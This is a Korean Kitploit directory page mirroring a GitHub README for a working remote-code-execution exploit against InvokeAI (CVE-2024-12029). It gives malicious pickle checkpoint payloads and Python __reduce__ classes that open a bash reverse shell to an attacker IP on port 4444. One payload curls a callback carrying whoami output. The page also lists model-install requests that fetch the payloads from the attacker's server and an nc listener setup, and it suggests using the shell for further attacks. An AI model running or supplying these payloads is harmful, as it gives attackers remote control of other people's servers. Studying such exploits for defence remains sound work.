Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — 이 저장소는 SSH 키 주입이 실패할 때 InvokeAI RCE 취약점(CVE-2024-12029)에 대한 대체 페이로드 접근 방식을 포함합니다. 페이로드는 pickle 역직렬화가 실제로 발생하는지 테스트하고 대체 액세스 방법을 제공하도록 설계되었습니다. | Kitploit
도구/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access ToolPayload Development
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

이 저장소는 SSH 키 주입이 실패할 때 InvokeAI RCE 취약점(CVE-2024-12029)에 대한 대체 페이로드 접근 방식을 포함합니다. 페이로드는 pickle 역직렬화가 실제로 발생하는지 테스트하고 대체 액세스 방법을 제공하도록 설계되었습니다.

저장소 보기
34개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

대안 접근법: 리버스 셸 및 콜백 테스트

개요

이 저장소는 SSH 키 주입이 실패할 때 InvokeAI RCE 취약점(CVE-2024-12029)에 대한 대안 페이로드 접근 방식을 포함합니다. 페이로드는 pickle 역직렬화가 실제로 발생하는지 테스트하고 대체 접근 방법을 제공하도록 설계되었습니다.

문제 설명

SSH 키 주입 페이로드가 성공적으로 전달(Status 201)되었지만 SSH 접속에 여전히 비밀번호가 필요한 경우, 이는 다음 중 하나를 나타냅니다:

  1. pickle 역직렬화가 발생하지 않음
  2. 명령어가 차단/샌드박싱되고 있음
  3. 실행 방식이 호환되지 않음

해결책: 대안 페이로드

📁 페이로드 파일

리버스 셸 페이로드

  • payload_reverse_bash.ckpt (89 bytes) - Bash 리버스 셸
  • payload_reverse_python.ckpt (267 bytes) - Python 리버스 셸
  • payload_reverse_nc.ckpt (70 bytes) - Netcat 리버스 셸
  • 테스트 및 검증 페이로드

    • payload_callback_test.ckpt (115 bytes) - 역직렬화 확인을 위한 HTTP 콜백
    • payload_test.ckpt (90 bytes) - 간단한 파일 생성 테스트
    • payload_alt_exec.ckpt (223 bytes) - 대체 실행 방식

    SSH 페이로드 (참고용)

    • payload_ssh_simple.ckpt (271 bytes) - 리눅스 호환 SSH 키 주입

    🛠️ 테스트 스크립트

    Kali 테스트 스크립트

    • kali_reverse_test.py - 종합 테스트 스위트

    페이로드 생성기

    • reverse_shell_payload.py - 리버스 셸 페이로드 생성

    🚀 빠른 사용법

    1. 페이로드 서버 시작

    root@kitploit:~
    python web_server.py --port 8000
    

    2. 콜백 테스트 (먼저 권장)

    root@kitploit:~
    # Copy kali_reverse_test.py to Kali and run:
    python3 kali_reverse_test.py
    # Choose option 1 to test callback
    

    3. 리버스 셸 테스트

    root@kitploit:~
    # Start listener on Kali:
    nc -lvnp 4444
    
    # Send reverse shell payload:
    python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"
    

    4. 간단한 실행 테스트

    root@kitploit:~
    # Test basic command execution:
    python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"
    
    # Verify file creation:
    ssh [email protected] 'cat /tmp/payload_test.txt'
    

    📊 테스트 결과 해석

    ✅ 콜백 테스트 성공

    • 의미: pickle 역직렬화가 작동하고 있음
    • 다음 단계: 리버스 셸 또는 대체 SSH 페이로드 시도
    • 확인: HTTP 콜백에 대한 웹 서버 로그 확인

    ✅ 리버스 셸 성공

    • 의미: 명령어가 실행되고 네트워크 접근이 작동함
    • 결과: netcat 리스너를 통한 직접 셸 접근
    • 다음 단계: 추가 공격을 위해 리버스 셸 사용

    ✅ 테스트 파일 생성됨

    • 의미: 기본 명령어 실행이 작동함
    • 다음 단계: 대체 SSH 주입 방법 시도
    • 확인: 대상에서 /tmp/payload_test.txt 확인

    콜백 페이로드

    root@kitploit:~
    class CallbackTestPayload:
        def __reduce__(self):
            import os
            command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
            return (os.system, (command,))
    

    리버스 셸 페이로드

    root@kitploit:~
    class ReverseShellPayload:
        def __reduce__(self):
            import os
            command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
            return (os.system, (command,))
    

    테스트 페이로드

    root@kitploit:~
    class TestPayload:
        def __reduce__(self):
            import os
            return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))
    

    📚 참고 자료

    • CVE-2024-12029: InvokeAI 원격 코드 실행
    • PyTorch 불안전 역직렬화: torch.load() 취약점
    • Pickle reduce: Python 객체 직렬화 악용

    ⚠️ 면책 조항

    이 저장소는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다. 사용자는 시스템을 테스트하기 전에 적절한 권한을 획득했는지 확인할 책임이 있습니다.

    도구 다운로드